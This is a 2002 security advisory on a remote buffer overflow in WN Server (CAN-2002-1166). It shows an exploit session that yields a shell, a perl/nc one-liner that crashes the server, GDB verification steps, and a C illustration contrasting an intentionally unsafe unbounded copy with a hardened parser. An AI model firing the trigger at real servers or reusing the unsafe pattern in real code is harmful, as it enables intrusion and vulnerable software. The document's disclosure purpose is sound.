
WN Server remote buffer overflows
1st Oct 2002 [SBWID-5717]



	John Franks’ WN Server versions 1.18.2 through 2.0.0


	From David Endler of iDEFENSE's security advisory [09.30.2002]:

	 This issue was exclusively disclosed to iDEFENSE by badc0ded


	Exploitation is possible by issuing WN Server a  long  GET  request.  In
	order to successfully exploit this vulnerability, customized shell  code
	is required to bypass the character filtering that WN Server imposes  on
	the requested URI.

	"WN is a Web server which runs on a wide variety of UNIX  platforms  and
	is freely available at no cost for any use under the terms  of  the  GNU
	General Public License." It is included  in  the  latest  FreeBSD  ports
	collection as well.

	The Mitre Corp.'s Common Vulnerabilities  and  Exposures  (CVE)  Project
	has assigned the identification number CAN-2002-1166 to this issue.



	The following is a snapshot of an exploit at work:

	    $ (./wn_bof 0 3; cat) | nc target 80
	    Trying ret=0xbfbeb4ec
	    $ id
	    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
	    $ uname



	Exploitation of a buffer overflow usually results in one of two things:
	the targeted process or application crashes, or arbitrary code executes.
	Both have serious repercussions, but in most cases code execution is
	more threatening in that it could allow for the further usurpation of
	higher-level privileges on the targeted host.


	wn-1.18.2 - wn-2.0.0, which is included in the current version of the
	FreeBSD Project’s FreeBSD ports collection, is vulnerable. Take the
	following steps to determine whether a specific WN implementation is

	1. Ensure that WN is running and open two terminals.

	2. In the first terminal execute:

	    $ (perl -e 'print "GET /" . "a"x1600';cat)|nc localhost 80

	3. In the second terminal, determine the process ID of the child that
	   was spawned to handle the previous command, and attach GDB to it:

	    # ps ax | grep swn
	      4223 ?? Ss 0:00.29 ./swn
	      4711 ?? S 0:00.01 ./swn
	    # gdb ./swn 4711
	      GNU gdb 4.18
	      Copyright 1998 Free Software Foundation, Inc.

	4. In the second terminal, type 'c', telling GDB to continue.

	5. In the first terminal, press enter. If at this point the following
	   output is returned from GDB, then a vulnerable WN implementation is

	    Program received signal SIGSEGV, Segmentation fault.  0x61616161 in ?? ()
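	The bug class behind both the "long GET request" described earlier and the
	GDB result above (0x61616161 is four 'a' bytes from the test request being
	used where a saved return address was expected), shown as an added
	illustration in C. This is not WN Server's code and does not reproduce its
	actual parser; the URI_MAX limit of 1024, the function names and the
	request-line handling are assumptions made for the example. The unsafe
	routine copies the URI into a fixed-size buffer without a bound; the
	hardened one validates the method, refuses a URI that does not fit, and
	returns a result code instead of overrunning the buffer.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical buffer size for the URI; the advisory does not state WN's real limit. */
#define URI_MAX 1024

enum parse_result { URI_OK = 0, URI_BAD_REQUEST = -1, URI_TOO_LONG = -2 };

/* Unsafe pattern (illustration only, not WN's code): the URI is copied into a
 * fixed-size buffer with no check against its size. A request line of "GET /"
 * followed by 1600 'a' bytes overruns 'uri' and whatever follows it on the
 * stack, including the saved return address, which is why GDB reports the
 * crash at 0x61616161 (four 'a' bytes interpreted as an address). */
void copy_uri_unsafe(const char *request_line, char uri[URI_MAX])
{
    const char *start = request_line + 4;      /* skip "GET " */
    const char *end = strchr(start, ' ');      /* URI ends at " HTTP/1.x" if present */
    size_t len = end ? (size_t)(end - start) : strlen(start);
    memcpy(uri, start, len);                   /* no bound: len may exceed URI_MAX */
    uri[len] = '\0';
}

/* Hardened version: validate the method, bound the copy, and refuse a URI that
 * does not fit rather than truncating it silently. */
int parse_uri_safe(const char *request_line, char uri[URI_MAX])
{
    if (strncmp(request_line, "GET ", 4) != 0)
        return URI_BAD_REQUEST;
    const char *start = request_line + 4;
    const char *end = strchr(start, ' ');
    size_t len = end ? (size_t)(end - start) : strlen(start);
    if (len == 0 || start[0] != '/')
        return URI_BAD_REQUEST;
    if (len >= URI_MAX)                        /* keep one byte for the NUL terminator */
        return URI_TOO_LONG;
    memcpy(uri, start, len);
    uri[len] = '\0';
    return URI_OK;
}

/* Parses a request line with the hardened parser and returns only the result code. */
int classify_request_line(const char *request_line)
{
    char uri[URI_MAX];
    return parse_uri_safe(request_line, uri);
}

/* Builds the advisory's test input, "GET /" followed by n 'a' bytes, into out.
 * Returns the length written (excluding the NUL), or 0 if it does not fit. */
size_t build_long_get(char *out, size_t out_size, size_t n)
{
    if (out_size < 5 + n + 1)
        return 0;
    memcpy(out, "GET /", 5);
    memset(out + 5, 'a', n);
    out[5 + n] = '\0';
    return 5 + n;
}

/* Runs the hardened parser on the advisory's 1600-byte request line (constructed input). */
int advisory_test_case_result(void)
{
    char line[2048];                           /* large enough for the 1605-byte line */
    if (build_long_get(line, sizeof line, 1600) == 0)
        return URI_BAD_REQUEST;
    return classify_request_line(line);
}

int main(void)
{
    char uri[URI_MAX];
    copy_uri_unsafe("GET /index.html HTTP/1.0", uri);   /* short input: fits, no overrun */
    printf("unsafe copy of a short URI: %s\n", uri);
    printf("hardened parser, short URI: %d\n",
           classify_request_line("GET /index.html HTTP/1.0"));
    printf("hardened parser, 1600-byte URI: %d (URI_TOO_LONG is %d)\n",
           advisory_test_case_result(), URI_TOO_LONG);
    return 0;
}
```

	The point of the hardened parser is that an over-length URI becomes a
	rejected request with a result code rather than a write past the end of a
	fixed buffer; the same 1600-byte input that the advisory uses to trigger
	the SIGSEGV is turned away before any copy happens.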



	WN Server 2.4.4 is available at

